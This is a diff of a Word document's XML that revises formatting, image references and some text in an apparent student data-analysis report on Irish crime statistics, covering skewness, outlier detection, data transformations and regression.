+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">The CDF chart shows that the VALUE column is skewed to the right. This means that there is a relatively small number of crimes with very high values, and </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>a large number of</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> crimes with lower values.</w:t>
       </w:r>
@@ -10776,12 +11045,16 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Most crimes have relatively low values.</w:t>
       </w:r>
@@ -10790,12 +11063,16 @@
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>There is a small number of crimes with very high values.</w:t>
       </w:r>
@@ -10803,41 +11080,62 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
+      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-      </w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Evolution</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Evolution</w:t>
+        <w:t xml:space="preserve"> of top 5 type of offence </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> of top 5 type of offence </w:t>
+        <w:t>from 2003 to 202</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>from 2003 to 2023Q2</w:t>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10860,12 +11158,11 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35AA9140" wp14:editId="216CD647">
-            <wp:extent cx="4948989" cy="2454982"/>
-            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
-            <wp:docPr id="1294589389" name="Picture 1" descr="A graph of different colored lines&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67081793" wp14:editId="4AD8798F">
+            <wp:extent cx="6120130" cy="2246630"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="975429675" name="Picture 1" descr="A graph with different colored lines&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10873,36 +11170,23 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1294589389" name="Picture 1" descr="A graph of different colored lines&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
+                    <pic:cNvPr id="975429675" name="Picture 1" descr="A graph with different colored lines&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4958123" cy="2459513"/>
+                      <a:ext cx="6120130" cy="2246630"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -11001,59 +11285,16 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t>The most common crime offences in Ireland are theft and related offences, public order and other social code offences, and disorderly conduct. These three offences have consistently been in the top 5 since 2002.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>The number of theft and related offences has declined significantly over time, from over 70,000 in 2002 to just over 40,000 in 2022. This is a decrease of over 40%.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">We </w:t>
+        <w:t xml:space="preserve">The chart shows that all five types of offences have increased over time. Theft and related offences </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>have to</w:t>
+        <w:t>has</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> consider that the information in the chart is only up to July 2023. This means that it is possible that the crime rates for the year </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>as a whole will</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> be different from the rates shown in the chart.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:t>However, the chart does provide a valuable snapshot of the crime situation in Ireland in the first half of 2023. It shows that the overall crime rate has continued to decline, but that there are still some areas where crime remains a problem.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> shown the smallest increase, followed by public order and other social code offences. The other three types of offence have all shown larger increases. After 2021, all 5 types of offences started to increase, with theft and related offences leading the increase.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11149,14 +11390,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> to extract total population figures between 2003 and 2023, excluding regional data. We must then multiply the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t xml:space="preserve"> to extract total population figures between 2003 and 202</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -11170,7 +11406,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
+        <w:t>2</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11185,14 +11422,9 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+        <w:t>, excluding regional data. We must then multiply the</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -11206,7 +11438,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11221,18 +11454,16 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>To compare the evolution of the population and crime rate, a line chart has been plotted.</w:t>
+        <w:t>population by 1000 to account for the fact that the population is shown in thousands and crimes are shown in units.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
         <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -11247,14 +11478,51 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>To compare the evolution of the population and crime rate, a line chart has been plotted.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BFBF591" wp14:editId="2118C07B">
-            <wp:extent cx="5570621" cy="1564028"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="191194753" name="Picture 2" descr="A graph and chart with lines&#10;&#10;Description automatically generated with medium confidence"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A3D4FB" wp14:editId="3A54AACE">
+            <wp:extent cx="6120130" cy="1750060"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="234800243" name="Picture 1" descr="A graph of a line and a line&#10;&#10;Description automatically generated with medium confidence"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -11262,36 +11530,23 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="191194753" name="Picture 2" descr="A graph and chart with lines&#10;&#10;Description automatically generated with medium confidence"/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
+                    <pic:cNvPr id="234800243" name="Picture 1" descr="A graph of a line and a line&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:srcRect/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5583205" cy="1567561"/>
+                      <a:ext cx="6120130" cy="1750060"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
                     </a:prstGeom>
-                    <a:noFill/>
-                    <a:ln>
-                      <a:noFill/>
-                    </a:ln>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>
@@ -11456,6 +11711,15 @@
         </w:rPr>
         <w:t>From the figure above, we can see that the crime rate in Ireland has declined significantly over time, while the population has grown steadily.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11665,7 +11929,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -11730,8 +11994,6 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -11748,8 +12010,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -11768,8 +12028,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -11899,7 +12157,6 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:lang w:val="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">These tasks will be performed in the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -11959,6 +12216,16 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
+          <w:lang w:val="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -12031,6 +12298,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Considering that this dataset is highly skewed, the IQR method is the more appropriate choice for identifying potential outliers.</w:t>
       </w:r>
     </w:p>
@@ -12038,6 +12306,9 @@
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>After applying the IQR method, we have a table with the rows with outliers:</w:t>
@@ -12048,6 +12319,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -12068,7 +12345,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27"/>
+                    <a:blip r:embed="rId28"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -12093,6 +12370,9 @@
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
+      <w:r>
+        <w:t>F</w:t>
+      </w:r>
       <w:r>
         <w:t>or skewness, a</w:t>
       </w:r>
@@ -12206,7 +12486,7 @@
                                           <pic:cNvPicPr/>
                                         </pic:nvPicPr>
                                         <pic:blipFill>
-                                          <a:blip r:embed="rId28"/>
+                                          <a:blip r:embed="rId29"/>
                                           <a:stretch>
                                             <a:fillRect/>
                                           </a:stretch>
@@ -12281,7 +12561,7 @@
                                     <pic:cNvPicPr/>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId28"/>
+                                    <a:blip r:embed="rId29"/>
                                     <a:stretch>
                                       <a:fillRect/>
                                     </a:stretch>
@@ -12386,14 +12666,30 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Square Root</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve"> Transformation</w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>:</w:t>
       </w:r>
     </w:p>
@@ -12428,7 +12724,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218733AC" wp14:editId="2E3B78D9">
             <wp:extent cx="2231388" cy="881063"/>
@@ -12445,7 +12740,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -12727,23 +13022,32 @@
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
         <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Cube Root</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:noProof/>
         </w:rPr>
         <w:t xml:space="preserve"> Transformation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:noProof/>
         </w:rPr>
         <w:t>:</w:t>
@@ -12891,7 +13195,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId31"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13083,7 +13387,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId31"/>
+                    <a:blip r:embed="rId32"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13175,7 +13479,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32" cstate="print">
+                    <a:blip r:embed="rId33" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -13341,32 +13645,30 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
+        <w:t>The best approach was applying both Log transformation and Reciprocal transformation consecutively, which handled the skewness</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>successful,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and it is still suitable for regressio</w:t>
+      </w:r>
+      <w:r>
+        <w:t>n.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>The best approach was applying both Log transformation and Reciprocal transformation consecutively, which handled the skewness</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>successful</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and it is still suitable for regressio</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DD3F51" wp14:editId="357BDBEA">
             <wp:extent cx="6120130" cy="2458720"/>
@@ -13383,7 +13685,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId34"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13566,7 +13868,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId35"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13649,7 +13951,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13678,18 +13980,18 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:t>Applying square or cube transformation was effective at reducing skewness, but it was not enough to fully adjust the highly skewed columns. The best option is to apply both transformations.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Applying square or cube transformation was effective at reducing skewness, but it was not enough to fully adjust the highly skewed columns. The best option is to apply both transformations.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F3292D7" wp14:editId="57D02F37">
             <wp:extent cx="6120130" cy="2794635"/>
@@ -13706,7 +14008,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13913,7 +14215,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -13987,10 +14289,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Predicting Crime </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -14004,9 +14304,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Rate  after</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Rate after</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -14028,6 +14327,7 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">For </w:t>
       </w:r>
       <w:r>
@@ -14054,14 +14354,21 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
         <w:t>Linear regression:</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Linear regression is a powerful model that can be used to predict continuous variables, such as population growth</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Linear regression is a powerful model that can be used to predict continuous variables, such as population growth</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> or crime rate, that is because </w:t>
@@ -14127,7 +14434,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38"/>
+                    <a:blip r:embed="rId39"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
